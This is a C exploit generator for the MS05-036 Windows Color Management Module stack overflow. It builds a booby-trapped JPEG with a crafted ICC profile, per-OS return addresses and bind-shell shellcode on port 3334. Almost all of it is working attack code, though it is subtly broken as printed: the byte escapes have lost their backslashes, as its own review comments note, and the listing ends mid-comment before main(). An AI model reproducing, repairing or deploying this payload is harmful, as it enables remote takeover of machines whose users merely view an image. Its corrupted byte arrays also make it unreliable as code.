
# Title : MS Windows Color Management Module Overflow Exploit (MS05-036) (2)
# Published : 2006-02-17
# Author : darkeagle


/*
		MS05-036 ICC Stack Overflow Exploit
/				by Darkeagle

/	GreetZ:	all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand

/
		special tnx to snooq for his PoC.
/		
		
/	xploit was tested on WinXP SP1 RUS with explorer.exe

/	02.08.05

/	http://eagle.blacksecurity.org
		
*/

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define TARGET 1
#define NOP 0x90
#define FNAME "eagl3.jpg"
#define BSIZE sizeof(buff)-1
#define EIP_OFFSET 0x3A0
#define SC_OFFSET 0x246
#define NOP_OFFSET 0x218
#define NOP_SIZE 0x112

#define tag_content_offset 0x23E // file buffer offset craft stuff
#define content_size_offset 0xE2 // tag content buffer size
#define no_access_violate 0x32E // avoid access violate
#define no_access_violate2 0x32E+12 // avoid access violate
#define stack_land_offset ret_addr_offset+16 // reture address offset
#define ret_addr_offset no_access_violate+8 // reture address offset

/*
* Silly JPEG stuffed with ICC profile.........
*/

/*
 * Carrier file: a JPEG (SOI, APP0 "JFIF") whose APP2 segment is tagged
 * "ICC_PROFILE" and holds an ICC profile (header, tag table, tag data),
 * followed by the image's DQT, DHT, SOF0 and SOS segments. main() overwrites
 * the region starting at tag_content_offset and the size field at
 * content_size_offset before buildfile() writes the whole array out.
 * NOTE(review): as printed here every "\x" escape appears without its
 * backslash (e.g. "xFFxD8"), so the literal holds ASCII text rather than the
 * intended bytes and the offsets above would not line up with it.
 */
char buff[]=
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x00x01x00x60"
"x00x60x00x00xFFxE2x0Cx58x49x43x43x5Fx50x52x4Fx46"
"x49x4Cx45x00x01x01x00x00x0Cx48x4Cx69x6Ex6Fx02x10"
"x00x00x6Dx6Ex74x72x52x47x42x20x58x59x5Ax20x07xCE"
"x00x02x00x09x00x06x00x31x00x00x61x63x73x70x4Dx53"
"x46x54x00x00x00x00x49x45x43x20x73x52x47x42x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xF6xD6x00x01"
"x00x00x00x00xD3x2Dx48x50x20x20x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x11x63x70x72x74x00x00"
"x01x50x00x00x00x33x64x65x73x63x00x00x01x84x00x00"
"x00x6Cx77x74x70x74x00x00x01xF0x00x00x00x14x62x6B"
"x70x74x00x00x02x04x00x00x00x14x72x58x59x5Ax00x00"
"x02x18x00x00x00xFCx67x58x59x5Ax00x00x02x2Cx00x00"
"x00x14x62x58x59x5Ax00x00x02x40x00x00x00x14x64x6D"
"x6Ex64x00x00x02x54x00x00x00x70x64x6Dx64x64x00x00"
"x02xC4x00x00x00x88x76x75x65x64x00x00x03x4Cx00x00"
"x00x86x76x69x65x77x00x00x03xD4x00x00x00x24x6Cx75"
"x6Dx69x00x00x03xF8x00x00x00x14x6Dx65x61x73x00x00"
"x04x0Cx00x00x00x24x74x65x63x68x00x00x04x30x00x00"
"x00x0Cx72x54x52x43x00x00x04x3Cx00x00x08x0Cx67x54"
"x52x43x00x00x04x3Cx00x00x08x0Cx62x54x52x43x00x00"
"x04x3Cx00x00x08x0Cx74x65x78x74x00x00x00x00x43x6F"
"x70x79x72x69x67x68x74x20x28x63x29x20x31x39x39x38"
"x20x48x65x77x6Cx65x74x74x2Dx50x61x63x6Bx61x72x64"
"x20x43x6Fx6Dx70x61x6Ex79x00x00x64x65x73x63x00x00"
"x00x00x00x00x00x12x73x52x47x42x20x49x45x43x36x31"
"x39x36x36x2Dx32x2Ex31x00x00x00x00x00x00x00x00x00"
"x00x00x12x73x52x47x42x20x49x45x43x36x31x39x36x36"
"x2Dx32x2Ex31x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x58x59x5Ax20x00x00x00x00x00x00"
"xF3x51x00x01x00x00x00x01x16xCCx58x59x5Ax20x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x58x59"
"x5Ax20x00x00x00x00x00x00x6FxA2x00x00x38xF5x00x00"
"x03x90x58x59x5Ax20x00x00x00x00x00x00x62x99x00x00"
"xB7x85x00x00x18xDAx58x59x5Ax20x00x00x00x00x00x00"
"x24xA0x00x00x0Fx84x00x00xB6xCFx64x65x73x63x00x00"
"x00x00x00x00x00x16x49x45x43x20x68x74x74x70x3Ax2F"
"x2Fx77x77x77x2Ex69x65x63x2Ex63x68x00x00x00x00x00"
"x00x00x00x00x00x00x16x49x45x43x20x68x74x74x70x3A"
"x2Fx2Fx77x77x77x2Ex69x65x63x2Ex63x68x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x64x65x73x63x00x00"
"x00x00x00x00x00x2Ex49x45x43x20x36x31x39x36x36x2D"
"x32x2Ex31x20x44x65x66x61x75x6Cx74x20x52x47x42x20"
"x63x6Fx6Cx6Fx75x72x20x73x70x61x63x65x20x2Dx20x73"
"x52x47x42x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x04x41x41x41x41x42x42x42x42x43x43x43x43x65x66"
"x61x75x6Cx74x20x52x47x42x20x63x6Fx6Cx6Fx75x72x20"
"x73x70x61x63x65x20x2Dx20x73x52x47x42x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x64x65x73x63x00x00x00x00x00x00x00x2Cx52x65"
"x66x65x72x65x6Ex63x65x20x56x69x65x77x69x6Ex67x20"
"x43x6Fx6Ex64x69x74x69x6Fx6Ex20x69x6Ex20x49x45x43"
"x36x31x39x36x36x2Dx32x2Ex31x00x00x00x00x00x00x00"
"x00x00x00x00x2Cx52x65x66x65x72x65x6Ex63x65x20x56"
"x69x65x77x69x6Ex67x20x43x6Fx6Ex64x69x74x69x6Fx6E"
"x20x69x6Ex20x49x45x43x36x31x39x36x36x2Dx32x2Ex31"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x76x69x65x77x00x00"
"x00x00x00x13xA4xFEx00x14x5Fx2Ex00x10xCFx14x00x03"
"xEDxCCx00x04x13x0Bx00x03x5Cx9Ex00x00x00x01x58x59"
"x5Ax20x00x00x00x00x00x4Cx09x56x00x50x00x00x00x57"
"x1FxE7x6Dx65x61x73x00x00x00x00x00x00x00x01x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x02x8Fx00x00x00x02x73x69x67x20x00x00x00x00x43x52"
"x54x20x63x75x72x76x00x00x00x00x00x00x04x00x00x00"
"x00x05x00x0Ax00x0Fx00x14x00x19x00x1Ex00x23x00x28"
"x00x2Dx00x32x00x37x00x3Bx00x40x00x45x00x4Ax00x4F"
"x00x54x00x59x00x5Ex00x63x00x68x00x6Dx00x72x00x77"
"x00x7Cx00x81x00x86x00x8Bx00x90x00x95x00x9Ax00x9F"
"x00xA4x00xA9x00xAEx00xB2x00xB7x00xBCx00xC1x00xC6"
"x00xCBx00xD0x00xD5x00xDBx00xE0x00xE5x00xEBx00xF0"
"x00xF6x00xFBx01x01x01x07x01x0Dx01x13x01x19x01x1F"
"x01x25x01x2Bx01x32x01x38x01x3Ex01x45x01x4Cx01x52"
"x01x59x01x60x01x67x01x6Ex01x75x01x7Cx01x83x01x8B"
"x01x92x01x9Ax01xA1x01xA9x01xB1x01xB9x01xC1x01xC9"
"x01xD1x01xD9x01xE1x01xE9x01xF2x01xFAx02x03x02x0C"
"x02x14x02x1Dx02x26x02x2Fx02x38x02x41x02x4Bx02x54"
"x02x5Dx02x67x02x71x02x7Ax02x84x02x8Ex02x98x02xA2"
"x02xACx02xB6x02xC1x02xCBx02xD5x02xE0x02xEBx02xF5"
"x03x00x03x0Bx03x16x03x21x03x2Dx03x38x03x43x03x4F"
"x03x5Ax03x66x03x72x03x7Ex03x8Ax03x96x03xA2x03xAE"
"x03xBAx03xC7x03xD3x03xE0x03xECx03xF9x04x06x04x13"
"x04x20x04x2Dx04x3Bx04x48x04x55x04x63x04x71x04x7E"
"x04x8Cx04x9Ax04xA8x04xB6x04xC4x04xD3x04xE1x04xF0"
"x04xFEx05x0Dx05x1Cx05x2Bx05x3Ax05x49x05x58x05x67"
"x05x77x05x86x05x96x05xA6x05xB5x05xC5x05xD5x05xE5"
"x05xF6x06x06x06x16x06x27x06x37x06x48x06x59x06x6A"
"x06x7Bx06x8Cx06x9Dx06xAFx06xC0x06xD1x06xE3x06xF5"
"x07x07x07x19x07x2Bx07x3Dx07x4Fx07x61x07x74x07x86"
"x07x99x07xACx07xBFx07xD2x07xE5x07xF8x08x0Bx08x1F"
"x08x32x08x46x08x5Ax08x6Ex08x82x08x96x08xAAx08xBE"
"x08xD2x08xE7x08xFBx09x10x09x25x09x3Ax09x4Fx09x64"
"x09x79x09x8Fx09xA4x09xBAx09xCFx09xE5x09xFBx0Ax11"
"x0Ax27x0Ax3Dx0Ax54x0Ax6Ax0Ax81x0Ax98x0AxAEx0AxC5"
"x0AxDCx0AxF3x0Bx0Bx0Bx22x0Bx39x0Bx51x0Bx69x0Bx80"
"x0Bx98x0BxB0x0BxC8x0BxE1x0BxF9x0Cx12x0Cx2Ax0Cx43"
"x0Cx5Cx0Cx75x0Cx8Ex0CxA7x0CxC0x0CxD9x0CxF3x0Dx0D"
"x0Dx26x0Dx40x0Dx5Ax0Dx74x0Dx8Ex0DxA9x0DxC3x0DxDE"
"x0DxF8x0Ex13x0Ex2Ex0Ex49x0Ex64x0Ex7Fx0Ex9Bx0ExB6"
"x0ExD2x0ExEEx0Fx09x0Fx25x0Fx41x0Fx5Ex0Fx7Ax0Fx96"
"x0FxB3x0FxCFx0FxECx10x09x10x26x10x43x10x61x10x7E"
"x10x9Bx10xB9x10xD7x10xF5x11x13x11x31x11x4Fx11x6D"
"x11x8Cx11xAAx11xC9x11xE8x12x07x12x26x12x45x12x64"
"x12x84x12xA3x12xC3x12xE3x13x03x13x23x13x43x13x63"
"x13x83x13xA4x13xC5x13xE5x14x06x14x27x14x49x14x6A"
"x14x8Bx14xADx14xCEx14xF0x15x12x15x34x15x56x15x78"
"x15x9Bx15xBDx15xE0x16x03x16x26x16x49x16x6Cx16x8F"
"x16xB2x16xD6x16xFAx17x1Dx17x41x17x65x17x89x17xAE"
"x17xD2x17xF7x18x1Bx18x40x18x65x18x8Ax18xAFx18xD5"
"x18xFAx19x20x19x45x19x6Bx19x91x19xB7x19xDDx1Ax04"
"x1Ax2Ax1Ax51x1Ax77x1Ax9Ex1AxC5x1AxECx1Bx14x1Bx3B"
"x1Bx63x1Bx8Ax1BxB2x1BxDAx1Cx02x1Cx2Ax1Cx52x1Cx7B"
"x1CxA3x1CxCCx1CxF5x1Dx1Ex1Dx47x1Dx70x1Dx99x1DxC3"
"x1DxECx1Ex16x1Ex40x1Ex6Ax1Ex94x1ExBEx1ExE9x1Fx13"
"x1Fx3Ex1Fx69x1Fx94x1FxBFx1FxEAx20x15x20x41x20x6C"
"x20x98x20xC4x20xF0x21x1Cx21x48x21x75x21xA1x21xCE"
"x21xFBx22x27x22x55x22x82x22xAFx22xDDx23x0Ax23x38"
"x23x66x23x94x23xC2x23xF0x24x1Fx24x4Dx24x7Cx24xAB"
"x24xDAx25x09x25x38x25x68x25x97x25xC7x25xF7x26x27"
"x26x57x26x87x26xB7x26xE8x27x18x27x49x27x7Ax27xAB"
"x27xDCx28x0Dx28x3Fx28x71x28xA2x28xD4x29x06x29x38"
"x29x6Bx29x9Dx29xD0x2Ax02x2Ax35x2Ax68x2Ax9Bx2AxCF"
"x2Bx02x2Bx36x2Bx69x2Bx9Dx2BxD1x2Cx05x2Cx39x2Cx6E"
"x2CxA2x2CxD7x2Dx0Cx2Dx41x2Dx76x2DxABx2DxE1x2Ex16"
"x2Ex4Cx2Ex82x2ExB7x2ExEEx2Fx24x2Fx5Ax2Fx91x2FxC7"
"x2FxFEx30x35x30x6Cx30xA4x30xDBx31x12x31x4Ax31x82"
"x31xBAx31xF2x32x2Ax32x63x32x9Bx32xD4x33x0Dx33x46"
"x33x7Fx33xB8x33xF1x34x2Bx34x65x34x9Ex34xD8x35x13"
"x35x4Dx35x87x35xC2x35xFDx36x37x36x72x36xAEx36xE9"
"x37x24x37x60x37x9Cx37xD7x38x14x38x50x38x8Cx38xC8"
"x39x05x39x42x39x7Fx39xBCx39xF9x3Ax36x3Ax74x3AxB2"
"x3AxEFx3Bx2Dx3Bx6Bx3BxAAx3BxE8x3Cx27x3Cx65x3CxA4"
"x3CxE3x3Dx22x3Dx61x3DxA1x3DxE0x3Ex20x3Ex60x3ExA0"
"x3ExE0x3Fx21x3Fx61x3FxA2x3FxE2x40x23x40x64x40xA6"
"x40xE7x41x29x41x6Ax41xACx41xEEx42x30x42x72x42xB5"
"x42xF7x43x3Ax43x7Dx43xC0x44x03x44x47x44x8Ax44xCE"
"x45x12x45x55x45x9Ax45xDEx46x22x46x67x46xABx46xF0"
"x47x35x47x7Bx47xC0x48x05x48x4Bx48x91x48xD7x49x1D"
"x49x63x49xA9x49xF0x4Ax37x4Ax7Dx4AxC4x4Bx0Cx4Bx53"
"x4Bx9Ax4BxE2x4Cx2Ax4Cx72x4CxBAx4Dx02x4Dx4Ax4Dx93"
"x4DxDCx4Ex25x4Ex6Ex4ExB7x4Fx00x4Fx49x4Fx93x4FxDD"
"x50x27x50x71x50xBBx51x06x51x50x51x9Bx51xE6x52x31"
"x52x7Cx52xC7x53x13x53x5Fx53xAAx53xF6x54x42x54x8F"
"x54xDBx55x28x55x75x55xC2x56x0Fx56x5Cx56xA9x56xF7"
"x57x44x57x92x57xE0x58x2Fx58x7Dx58xCBx59x1Ax59x69"
"x59xB8x5Ax07x5Ax56x5AxA6x5AxF5x5Bx45x5Bx95x5BxE5"
"x5Cx35x5Cx86x5CxD6x5Dx27x5Dx78x5DxC9x5Ex1Ax5Ex6C"
"x5ExBDx5Fx0Fx5Fx61x5FxB3x60x05x60x57x60xAAx60xFC"
"x61x4Fx61xA2x61xF5x62x49x62x9Cx62xF0x63x43x63x97"
"x63xEBx64x40x64x94x64xE9x65x3Dx65x92x65xE7x66x3D"
"x66x92x66xE8x67x3Dx67x93x67xE9x68x3Fx68x96x68xEC"
"x69x43x69x9Ax69xF1x6Ax48x6Ax9Fx6AxF7x6Bx4Fx6BxA7"
"x6BxFFx6Cx57x6CxAFx6Dx08x6Dx60x6DxB9x6Ex12x6Ex6B"
"x6ExC4x6Fx1Ex6Fx78x6FxD1x70x2Bx70x86x70xE0x71x3A"
"x71x95x71xF0x72x4Bx72xA6x73x01x73x5Dx73xB8x74x14"
"x74x70x74xCCx75x28x75x85x75xE1x76x3Ex76x9Bx76xF8"
"x77x56x77xB3x78x11x78x6Ex78xCCx79x2Ax79x89x79xE7"
"x7Ax46x7AxA5x7Bx04x7Bx63x7BxC2x7Cx21x7Cx81x7CxE1"
"x7Dx41x7DxA1x7Ex01x7Ex62x7ExC2x7Fx23x7Fx84x7FxE5"
"x80x47x80xA8x81x0Ax81x6Bx81xCDx82x30x82x92x82xF4"
"x83x57x83xBAx84x1Dx84x80x84xE3x85x47x85xABx86x0E"
"x86x72x86xD7x87x3Bx87x9Fx88x04x88x69x88xCEx89x33"
"x89x99x89xFEx8Ax64x8AxCAx8Bx30x8Bx96x8BxFCx8Cx63"
"x8CxCAx8Dx31x8Dx98x8DxFFx8Ex66x8ExCEx8Fx36x8Fx9E"
"x90x06x90x6Ex90xD6x91x3Fx91xA8x92x11x92x7Ax92xE3"
"x93x4Dx93xB6x94x20x94x8Ax94xF4x95x5Fx95xC9x96x34"
"x96x9Fx97x0Ax97x75x97xE0x98x4Cx98xB8x99x24x99x90"
"x99xFCx9Ax68x9AxD5x9Bx42x9BxAFx9Cx1Cx9Cx89x9CxF7"
"x9Dx64x9DxD2x9Ex40x9ExAEx9Fx1Dx9Fx8Bx9FxFAxA0x69"
"xA0xD8xA1x47xA1xB6xA2x26xA2x96xA3x06xA3x76xA3xE6"
"xA4x56xA4xC7xA5x38xA5xA9xA6x1AxA6x8BxA6xFDxA7x6E"
"xA7xE0xA8x52xA8xC4xA9x37xA9xA9xAAx1CxAAx8FxABx02"
"xABx75xABxE9xACx5CxACxD0xADx44xADxB8xAEx2DxAExA1"
"xAFx16xAFx8BxB0x00xB0x75xB0xEAxB1x60xB1xD6xB2x4B"
"xB2xC2xB3x38xB3xAExB4x25xB4x9CxB5x13xB5x8AxB6x01"
"xB6x79xB6xF0xB7x68xB7xE0xB8x59xB8xD1xB9x4AxB9xC2"
"xBAx3BxBAxB5xBBx2ExBBxA7xBCx21xBCx9BxBDx15xBDx8F"
"xBEx0AxBEx84xBExFFxBFx7AxBFxF5xC0x70xC0xECxC1x67"
"xC1xE3xC2x5FxC2xDBxC3x58xC3xD4xC4x51xC4xCExC5x4B"
"xC5xC8xC6x46xC6xC3xC7x41xC7xBFxC8x3DxC8xBCxC9x3A"
"xC9xB9xCAx38xCAxB7xCBx36xCBxB6xCCx35xCCxB5xCDx35"
"xCDxB5xCEx36xCExB6xCFx37xCFxB8xD0x39xD0xBAxD1x3C"
"xD1xBExD2x3FxD2xC1xD3x44xD3xC6xD4x49xD4xCBxD5x4E"
"xD5xD1xD6x55xD6xD8xD7x5CxD7xE0xD8x64xD8xE8xD9x6C"
"xD9xF1xDAx76xDAxFBxDBx80xDCx05xDCx8AxDDx10xDDx96"
"xDEx1CxDExA2xDFx29xDFxAFxE0x36xE0xBDxE1x44xE1xCC"
"xE2x53xE2xDBxE3x63xE3xEBxE4x73xE4xFCxE5x84xE6x0D"
"xE6x96xE7x1FxE7xA9xE8x32xE8xBCxE9x46xE9xD0xEAx5B"
"xEAxE5xEBx70xEBxFBxECx86xEDx11xEDx9CxEEx28xEExB4"
"xEFx40xEFxCCxF0x58xF0xE5xF1x72xF1xFFxF2x8CxF3x19"
"xF3xA7xF4x34xF4xC2xF5x50xF5xDExF6x6DxF6xFBxF7x8A"
"xF8x19xF8xA8xF9x38xF9xC7xFAx57xFAxE7xFBx77xFCx07"
"xFCx98xFDx29xFDxBAxFEx4BxFExDCxFFx6DxFFxFFxFFxFE"
"x00x1Fx4Cx45x41x44x20x54x65x63x68x6Ex6Fx6Cx6Fx67"
"x69x65x73x20x49x6Ex63x2Ex20x56x31x2Ex30x31x00xFF"
"xDBx00x84x00x02x02x02x02x02x02x02x02x02x02x03x03"
"x02x03x04x07x04x04x03x03x04x08x06x06x05x07x0Ax09"
"x0Ax0Ax0Ax09x0Ax09x0Bx0Cx10x0Ex0Bx0Cx0Fx0Cx09x0A"
"x0Ex13x0Ex0Fx11x11x12x12x12x0Bx0Dx14x15x14x12x15"
"x10x12x12x11x01x03x03x03x04x03x04x08x04x04x08x11"
"x0Bx0Ax0Bx11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11x11"
"x11x11x11x11x11xFFxC4x01xA2x00x00x01x05x01x01x01"
"x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05"
"x06x07x08x09x0Ax0Bx01x00x03x01x01x01x01x01x01x01"
"x01x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08"
"x09x0Ax0Bx10x00x02x01x03x03x02x04x03x05x05x04x04"
"x00x00x01x7Dx01x02x03x00x04x11x05x12x21x31x41x06"
"x13x51x61x07x22x71x14x32x81x91xA1x08x23x42xB1xC1"
"x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19x1A"
"x25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45"
"x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65"
"x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85"
"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3"
"xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBA"
"xC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8"
"xD9xDAxE1xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4"
"xF5xF6xF7xF8xF9xFAx11x00x02x01x02x04x04x03x04x07"
"x05x04x04x00x01x02x77x00x01x02x03x11x04x05x21x31"
"x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1"
"xB1xC1x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1"
"x25xF1x17x18x19x1Ax26x27x28x29x2Ax35x36x37x38x39"
"x3Ax43x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59"
"x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77x78x79"
"x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97"
"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5"
"xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3"
"xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5xE6xE7xE8xE9xEA"
"xF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxC0x00x11x08x01x20"
"x01xE0x03x01x11x00x02x11x01x03x11x01xFFxDAx00x0C"
"x03x01x00x02x11x03x11x00x3Fx00xFDxFCxA0x02x80x0A"
"x00x28x00xA0x02x80x0Ax00x28x00xA0x02x80x0Ax00x28";

/*
 * Target table. For the entry chosen by main(): jmpADD is the value written at
 * ret_addr_offset (unless a command-line override is given) and writeable_add
 * the value written at no_access_violate2. The final entry, with jmpADD == 0,
 * is the terminator list_target() stops on. `v` is an unused instance of the
 * same anonymous struct type.
 */
struct {
    char *os;
    long jmpADD;
    long writeable_add;
} targets[] = {
    { .os = "Windows XP without SP eng/rus", .jmpADD = 0x77E9FC79, .writeable_add = 0x00064000 },
    { .os = "Windows XP SP1 eng/rus       ", .jmpADD = 0x77E9AE59, .writeable_add = 0x00064000 },
    { .os = "Windows 2000 SP0             ", .jmpADD = 0x77f8948b, .writeable_add = 0x00064000 },
    { .os = "Crash Explorer               ", .jmpADD = 0x41424344, .writeable_add = 0x00064000 },
    { .os = "Dummy (crash all)            ", .jmpADD = 0x0,        .writeable_add = 0x00064000 },
}, v;

/*
 * Payload that main() copies to stack_land_offset. main() sizes it with
 * strlen(), so the decoded bytes must contain no 0x00; buildfile() describes
 * it as binding port 3334.
 * NOTE(review): as printed here the "\x" escapes appear without their
 * backslash (e.g. "x33xc9"), so the array holds the ASCII text of the escapes
 * rather than the intended bytes, as with buff above.
 */
unsigned char shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5e"
"xb0x8cx35x83xebxfcxe2xf4xa2xdax67x78xb6x49x73xca"
"xa1xd0x07x59x7ax94x07x70x62x3bxf0x30x26xb1x63xbe"
"x11xa8x07x6ax7exb1x67x7cxd5x84x07x34xb0x81x4cxac"
"xf2x34x4cx41x59x71x46x38x5fx72x67xc1x65xe4xa8x1d"
"x2bx55x07x6ax7axb1x67x53xd5xbcxc7xbex01xacx8dxde"
"x5dx9cx07xbcx32x94x90x54x9dx81x57x51xd5xf3xbcxbe"
"x1exbcx07x45x42x1dx07x75x56xeexe4xbbx10xbex60x65"
"xa1x66xeax66x38xd8xbfx07x36xc7xffx07x01xe4x73xe5"
"x36x7bx61xc9x65xe0x73xe3x01x39x69x53xdfx5dx84x37"
"x0bxdax8excax8exd8x55x3cxabx1dxdbxcax88xe3xdfx66"
"x0dxe3xcfx66x1dxe3x73xe5x38xd8x81x33x38xe3x05xd4"
"xcbxd8x28x2fx2ex77xdbxcax88xdax9cx64x0bx4fx5cx5d"
"xfax1dxa2xdcx09x4fx5ax66x0bx4fx5cx5dxbbxf9x0ax7c"
"x09x4fx5ax65x0axe4xd9xcax8ex23xe4xd2x27x76xf5x62"
"xa1x66xd9xcax8exd6xe6x51x38xd8xefx58xd7x55xe6x65"
"x07x99x40xbcxb9xdaxc8xbcxbcx81x4cxc6xf4x4excex18"
"xa0xf2xa0xa6xd3xcaxb4x9exf5x1bxe4x47xa0x03x9axca"
"x2bxf4x73xe3x05xe7xdex64x0fxe1xe6x34x0fxe1xd9x64"
"xa1x60xe4x98x87xb5x42x66xa1x66xe6xcaxa1x87x73xe5"
"xd5xe7x70xb6x9axd4x73xe3x0cx4fx5cx5dxaex3ax88x6a"
"x0dx4fx5axcax8exb0x8cx35";
  

/*
 * Second payload, unused: nothing else in this file references shellcod2e
 * (main() uses shellcode). The inline comment below is the author's. As
 * elsewhere in this listing the "\x" escapes appear without their backslash.
 */
char shellcod2e[]= "xebx0ex5bx4bx33xc9xb1xf1x80x34x0bxeexe2xfaxebx05"
"xe8xedxffxffxff"
/* 220 bytes shellcode, xor with 0xee */
"x07x4axeexeexeexb1x8ax4fxdexeexeexeex65xaexe2x65"
"x9exf2x43x65x86xe6x65x19x84xeaxb7x06xaaxeexeexee"
"x0cx17x86x81x80xeexeex86x9bx9cx82x83xbax11xf8x65"
"x06x06xc0xeexeexeex6dx02xcex65x32x84xcexbdx11xb8"
"xeax29xeaxedxb2x8fxc0x8bx29xaaxedxeax96x8bxeexee"
"xddx2exbexbexbdxb9xbex11xb8xfex65x32xbexbdx11xb8"
"xe6x11xb8xe2xbfxb8x65x9bxd2x65x9axc0x96xedx1bxb8"
"x65x98xcexedx1bxddx27xa7xafx43xedx2bxddx35xe1x50"
"xfexd4x38x9axe6x2fx25xe3xedx34xaex05x1fxd5xf1x9b"
"x09xb0x65xb0xcaxedx33x88x65xe2xa5x65xb0xf2xedx33"
"x65xeax65xedx2bx45xb0xb7x2dx06xb9x11x11x11x60xa0"
"xe0x02x2fx97x0bx56x76x10x64xe0x90x36x0cx9dxd8xf4"
"xc1x9ex86x9ax9ax9exd4xc1xc1xdfxdcxd9xc0xdexc0xde"
"xc0xdfxc1x9ax8bx9dx9axc0x8bx96x8bxee";


/* Output of get_bytes(): the four low-order bytes of its argument, least significant first. */
unsigned char b[4];


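#ifndef _WIN32
/* windows.h provides DWORD (32-bit unsigned) on Windows; give it the same width elsewhere. */
typedef uint32_t DWORD;
#endif

/*
 * Reverse the byte order of a 32-bit value. The ICC profile stores its
 * 32-bit fields big-endian, so on a little-endian host this converts a
 * value to the layout the file expects (and back).
 *
 * Works on the value with shifts and masks rather than through a char
 * view of a partially written object, so the result does not depend on
 * how DWORD is laid out in memory or on the host's endianness.
 *
 * pBuf: value to swap.  Returns the swapped value.
 */
DWORD t2b(DWORD pBuf)
{
    uint32_t v = (uint32_t)pBuf;

    return (DWORD)(((v & 0x000000FFu) << 24) |
                   ((v & 0x0000FF00u) << 8)  |
                   ((v & 0x00FF0000u) >> 8)  |
                   ((v & 0xFF000000u) >> 24));
}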

/*
 * Store the four low-order bytes of word into the global b[], least
 * significant byte first. Nothing in this file calls it; main() uses
 * t2b() to byte-swap values instead.
 */
void get_bytes(long word)
{
    for (unsigned int k = 0; k < 4; k++) {
        b[k] = (unsigned char)((word >> (8 * k)) & 0xff);
    }
}

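/*
 * Print a diagnostic and terminate the process.
 *
 * The message goes to stderr so it is not mixed with the generator's normal
 * output, and the exit status is non-zero: the original exited with 0, which
 * told the calling shell that a failed run had succeeded. A NULL message is
 * tolerated. Does not return.
 */
void err_exit(const char *s)
{
    fprintf(stderr, "%s\n", s != NULL ? s : "error");
    exit(EXIT_FAILURE);
}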



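/*
 * Print size bytes of pbuf as two-digit upper-case hex, 16 bytes per row.
 * Not called anywhere in this file. The row break is a real newline (the
 * listing had a bare 'n'), and a final partial row is terminated too so the
 * output always ends at a line boundary when anything was printed.
 */
void hexdump(const char *pbuf, unsigned int size)
{
    for (unsigned int i = 0; i < size; i++) {
        printf("%.2X ", (unsigned char)pbuf[i]);
        if ((i + 1) % 16 == 0) {
            putchar('\n');
        }
    }

    if (size % 16 != 0) {
        putchar('\n');
    }
}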

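/*
 * Write the first BSIZE bytes of buff to FNAME in the current directory.
 *
 * The buffer is written with one fwrite() whose count is checked, and
 * fclose() is checked as well because it performs the final flush; the
 * original wrote byte-by-byte with fputc() and never looked at any result,
 * so a short or failed write still reported success. Errors go through
 * err_exit(), which does not return.
 */
void buildfile(void)
{
    FILE *fd = fopen(FNAME, "wb");
    if (fd == NULL) {
        err_exit("-> Failed to generate file...");
    }

    size_t want = BSIZE;
    size_t wrote = fwrite(buff, 1, want, fd);
    int close_rc = fclose(fd);
    if (wrote != want || close_rc != 0) {
        err_exit("-> Failed to write file...");
    }

    printf("-> '%s' generated.\n", FNAME);
    printf("-> shellcode binds 3334 port.\n");
}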

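/*
 * Reverse the byte order of every 4-byte group starting at p: within each
 * group bytes 0 and 3 are exchanged, then bytes 1 and 2.
 *
 * The walk advances in whole groups. When size is a multiple of 4 exactly
 * size bytes are touched; otherwise the last group runs up to 3 bytes past
 * p[size - 1], and the caller must make sure those bytes may be rewritten.
 * The original loop used `p <= q` and so always processed one extra group
 * beyond the end for an aligned size; it also declared an unused, wrongly
 * typed `DWORD *ptr = &p`.
 */
void dword_revert(char *p, unsigned int size)
{
    char *end = p + size;

    for (; p < end; p += 4) {
        char tmp = p[0];
        p[0] = p[3];
        p[3] = tmp;

        tmp = p[1];
        p[1] = p[2];
        p[2] = tmp;
    }
}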

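/*
 * Print the selectable entries of targets[], numbered from 1 as main()
 * expects them on the command line.
 *
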